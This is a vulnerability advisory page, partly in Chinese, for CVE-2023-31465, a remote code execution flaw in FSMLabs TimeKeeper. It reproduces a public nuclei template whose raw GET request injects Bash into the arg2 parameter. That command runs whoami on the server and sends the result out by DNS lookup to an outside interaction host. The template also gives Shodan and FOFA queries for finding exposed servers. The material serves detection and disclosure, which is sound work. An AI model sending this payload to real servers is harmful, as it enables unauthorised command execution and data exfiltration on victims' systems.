CVE-2023-31465: TimeKeeper by FSMLabs - Remote Code Execution

日期: 2025-08-01 | 影响软件: TimeKeeper | POC: 已公开

漏洞描述

An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.

PoC代码[已公开]

id: CVE-2023-31465

info:
  name: TimeKeeper by FSMLabs - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.
  reference:
    - https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-31465
    - https://fsmlabs.com/fsmlabs-cybersecurity/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-31465
    epss-score: 0.89914
    epss-percentile: 0.99553
    cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fsmlabs
    product: timekeeper
    shodan-query: http.favicon.hash:2134367771
    fofa-query: icon_hash=2134367771
  tags: cve,cve2023,timekeeper,rce,oast,fsmlabs

http:
  - raw:
      - |
        GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '{"seriesID":'
# digest: 4a0a00473045022100a0b6c9438f53e0eb74cb605b5d616fd6c59daff197a946b5a730fc89213c2ede022000cef5caaac712ae0f3d3f3ae36a464c673f346e33f96e71d7002b4769748f8a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-31465.yaml

相关漏洞推荐